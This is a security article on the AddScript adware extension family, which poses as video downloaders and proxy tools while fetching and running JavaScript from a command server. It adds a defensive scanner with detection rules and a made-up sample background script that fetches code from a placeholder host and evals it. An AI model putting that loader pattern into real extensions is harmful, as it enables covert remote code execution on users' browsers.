PUP (Potentially Unwanted Program) operators and threat actors continue to rely on the AddScript browser extension family as a source of new intrusive applications. The first AddScript applications were identified by cybersecurity researchers in 2019, and the family has remained active since. Details about this group of applications, and about adware and harmful browser extension activity in general, were published by malware researchers.

According to the researchers, AddScript applications are mostly spread under the guise of useful media tools. More specifically, they promise users the ability to download chosen audio and video content from various sources, such as social networks. Another common role for AddScript applications is that of a proxy manager. An important characteristic of this threat family is that its members almost always deliver the promised functionality, so as not to raise suspicion and to ensure that users do not remove them. Applications confirmed to belong to this family include Y2Mate - Video Downloader, helper and friGate3 proxy helper.

In the background, however, the AddScript extension pursues its real purpose. First, the extension contacts a hardcoded URL belonging to its Command-and-Control (C2, C&C) server. Once the connection is established, it fetches a malicious JavaScript payload from the C2 and executes it silently. One sign of this covert activity that users might notice is abnormally high CPU usage.
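The fetch-then-execute behaviour described above leaves recognisable traces in an extension's source. The following is an added example, not code from the article or from any AddScript sample: a heuristic static scan over an extension's files that flags hardcoded remote URLs, network fetch primitives, dynamic code execution and a manifest CSP that permits eval, then reports files combining a fetch with an execution sink. The sample files, the `example.invalid` URL and all function names are constructed for the illustration.

```javascript
// Heuristic rules for the remote-code-loading pattern: hardcoded URL,
// fetch primitive, and a sink that executes fetched text as code.
const RULES = [
  { id: 'hardcoded-url', re: /https?:\/\/[\w.-]+(?:\/[^\s'"`]*)?/g, desc: 'hardcoded remote URL' },
  { id: 'remote-fetch', re: /\b(fetch|XMLHttpRequest|importScripts)\b/g, desc: 'network fetch primitive' },
  { id: 'dynamic-eval', re: /\b(eval|Function)\s*\(/g, desc: 'dynamic code execution' },
  { id: 'script-inject', re: /createElement\s*\(\s*['"]script['"]\s*\)/g, desc: 'script tag injection' },
  { id: 'exec-code', re: /executeScript\s*\(\s*\{[^}]*\bcode\s*:/g, desc: 'executeScript with string code' },
];
const SINKS = ['dynamic-eval', 'script-inject', 'exec-code'];

// files: map of file name -> file text. Returns one finding per rule hit.
function scanExtensionSource(files) {
  const findings = [];
  for (const [name, text] of Object.entries(files)) {
    if (name.endsWith('manifest.json')) {
      let manifest;
      try { manifest = JSON.parse(text); } catch (e) { continue; }
      // MV2 uses a string CSP, MV3 an object; stringify covers both.
      const csp = JSON.stringify(manifest.content_security_policy || '');
      if (/unsafe-eval/.test(csp)) {
        findings.push({ file: name, id: 'csp-unsafe-eval', match: 'unsafe-eval', desc: 'manifest CSP allows eval' });
      }
      continue;
    }
    if (!/\.js$/.test(name)) continue;
    for (const rule of RULES) {
      for (const m of text.matchAll(rule.re)) {
        findings.push({ file: name, id: rule.id, match: m[0], desc: rule.desc });
      }
    }
  }
  return findings;
}

// Files that both fetch over the network and feed text into an execution sink.
function assessRemoteCodeLoading(findings) {
  const byFile = {};
  for (const f of findings) {
    byFile[f.file] = byFile[f.file] || new Set();
    byFile[f.file].add(f.id);
  }
  return Object.entries(byFile)
    .filter(([, ids]) => ids.has('remote-fetch') && SINKS.some(s => ids.has(s)))
    .map(([file]) => file);
}

// Constructed sample extension: a benign popup plus a background script
// that pulls a script from a placeholder C2 URL and evaluates it.
const SAMPLE_FILES = {
  'manifest.json': '{"manifest_version":2,"content_security_policy":"script-src \'self\' \'unsafe-eval\'; object-src \'self\'"}',
  'background.js': "const C2 = 'https://example.invalid/update.js';\nfetch(C2).then(r => r.text()).then(src => eval(src));",
  'popup.js': "document.getElementById('dl').onclick = () => downloadVideo();",
};
```

Running `assessRemoteCodeLoading(scanExtensionSource(SAMPLE_FILES))` flags only `background.js`; the rules are a triage aid, so a flagged file still needs manual review of what the fetched text is and where it goes.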

The exact function of the delivered code varies with the scheme the operators are running at the time. For example, the AddScript extension may play videos in the user's open browser tabs to generate profit from the supposed 'views.' Another possibility is a scheme known as 'cookie stuffing' or 'cookie dropping,' in which affiliate cookies are planted on the affected device. The fraudsters can then claim affiliate commissions for transactions and traffic that never occurred.
